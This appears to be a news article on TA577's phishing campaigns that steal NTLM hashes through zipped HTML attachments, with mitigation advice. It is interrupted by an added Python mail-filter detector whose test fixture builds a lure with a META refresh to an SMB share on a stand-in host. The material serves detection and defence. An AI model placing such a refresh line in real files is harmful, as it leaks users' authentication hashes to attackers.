Hacking Group TA577 Shifts Tactics, Stealing NTLM Hashes via Phishing Emails

ICARO Media Group
News
04/03/2024 22h57

The notorious hacking group known as TA577 has recently changed its strategy, utilizing phishing emails to pilfer NT LAN Manager (NTLM) authentication hashes for the purpose of account hijacking. This shift in tactics has raised concerns among cybersecurity professionals.

TA577, an initial access broker (IAB) previously associated with Qbot and connected to Black Basta ransomware infections, has been observed by email security firm Proofpoint showing a preference for deploying Pikabot. However, two recent attack waves have demonstrated a different approach.

On February 26 and 27, 2024, distinct TA577 campaigns were launched, targeting hundreds of organizations worldwide. Thousands of messages were disseminated, with the aim of compromising employees' NTLM hashes. NTLM hashes are integral to Windows authentication and session security, and their theft allows attackers to potentially escalate privileges, hijack accounts, access sensitive information, evade security measures, and move laterally within compromised networks.

In these new campaigns, TA577 initiated the attacks through phishing emails. The messages were crafted to appear as replies to earlier conversations, a tactic known as thread hijacking. Attached to these emails were unique ZIP archives containing HTML files. These files used HTML META refresh tags to trigger an automatic connection to a text file on an external Server Message Block (SMB) server. Upon connection, Windows devices would automatically attempt an NTLMv2 Challenge/Response, enabling the remote attacker-controlled server to capture the NTLM authentication hashes.

Proofpoint's report highlights that TA577 employed ZIP archives to generate a local file on the host. Had the file scheme URI been sent directly in the email body, the attack would not have worked on Outlook mail clients patched since July 2023. Interestingly, the URLs used in the attacks did not deliver any malware payloads, suggesting that the primary objective was to capture NTLM hashes.

Specific artifacts discovered on the SMB servers, including the presence of the open-source toolkit Impacket, further indicate the servers' role in the phishing attacks. However, cybersecurity professionals have noted that multi-factor authentication must be disabled on compromised accounts for threat actors to utilize these stolen NTLM hashes to breach networks successfully.

While some vulnerability researchers speculate that the stolen hashes may serve primarily as a form of reconnaissance to identify valuable targets, Proofpoint emphasizes the need for measures to mitigate the TA577 attack. Merely restricting guest access to SMB servers is insufficient, as the attack leverages automatic authentication to external servers, bypassing the need for guest access.

To safeguard against this type of attack, configuring a firewall to block all outbound SMB connections could prove effective. Additionally, implementing email filtering that blocks messages containing zipped HTML files can help prevent connections to unsafe endpoints upon opening. Another potential protective measure is the configuration of the 'Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers' Windows group policy, which prevents the sending of NTLM hashes. However, it's important to note that this may lead to authentication issues with legitimate servers.
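The attack chain described above (a ZIP attachment whose HTML member carries a META refresh to an SMB server) and the email-filtering mitigation described here can both be illustrated with a small mail-gateway check. The following Python is an added example and is not code from the article, from Proofpoint, or from any product; the hostnames, addresses (a documentation-reserved IP, not a real indicator), function names and the sample email are constructed for the example. It parses a message, unpacks any ZIP attachment in memory, flags zipped HTML outright (matching the filtering advice in the article), and additionally reports any META refresh whose target would make Windows open an SMB connection: a `file://` URI with a host component or a UNC path.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class MetaRefreshParser(HTMLParser):
    """Collect the URL targets of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases attribute names
        if a.get("http-equiv", "").lower() != "refresh":
            return
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())


def is_smb_target(url):
    """True if following this target would make Windows open an SMB connection:
    a UNC path (\\\\host\\share) or a file:// URI with a remote host part.
    A local file:///C:/... URI has no host and is not flagged."""
    u = url.strip()
    if u.startswith("\\\\") or u.startswith("//"):
        return True
    p = urlparse(u)
    return p.scheme.lower() == "file" and bool(p.netloc)


def scan_zip(data):
    """Inspect a ZIP attachment in memory. Returns the HTML member names and
    a list of (member, target) pairs whose META refresh points at SMB."""
    result = {"html_members": [], "smb_targets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".html", ".htm")):
                continue
            result["html_members"].append(info.filename)
            parser = MetaRefreshParser()
            parser.feed(zf.read(info).decode("utf-8", errors="replace"))
            for target in parser.targets:
                if is_smb_target(target):
                    result["smb_targets"].append((info.filename, target))
    return result


def scan_message(raw):
    """Gateway-style check over a raw RFC 5322 message: block zipped HTML and
    report any META refresh to an SMB target found inside the archive."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    verdict = {"block": False, "reasons": []}
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True)
        if not name.endswith(".zip") or not payload or not zipfile.is_zipfile(io.BytesIO(payload)):
            continue
        result = scan_zip(payload)
        if result["html_members"]:
            verdict["block"] = True
            verdict["reasons"].append(f"{name}: zipped HTML {result['html_members']}")
        for member, target in result["smb_targets"]:
            verdict["reasons"].append(f"{name}/{member}: META refresh to SMB target {target}")
    return verdict


def build_sample_zip():
    """Constructed sample archive: one lure page with a META refresh to an SMB
    share on a documentation-reserved address, plus one harmless page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.html", '<html><head><meta http-equiv="refresh" '
                    'content="0; url=file://203.0.113.7/share/doc.txt"></head></html>')
        zf.writestr("readme.htm", "<html><body>Hello</body></html>")
    return buf.getvalue()


def build_sample_message(zip_bytes):
    """Constructed sample email (hypothetical addresses) carrying the ZIP."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.org"
    msg["Subject"] = "RE: document"
    msg.set_content("See attached.")
    msg.add_attachment(zip_bytes, maintype="application", subtype="zip", filename="doc.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(scan_message(build_sample_message(build_sample_zip())))
```

The block-on-zipped-HTML decision is deliberately independent of the META refresh check: the refresh target is only reported as supporting detail, so an HTML member that reaches the SMB server by another route (script, a link the user clicks) is still blocked by the coarser rule the article recommends.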

For organizations using Windows 11, Microsoft has introduced an additional security feature to block NTLM-based attacks over SMB, offering a potential solution to combat TA577's new tactic.

As cyber threats continue to evolve, it is crucial for organizations to remain vigilant and implement appropriate security measures to protect their systems and sensitive information from the ever-present risk of malicious actors.
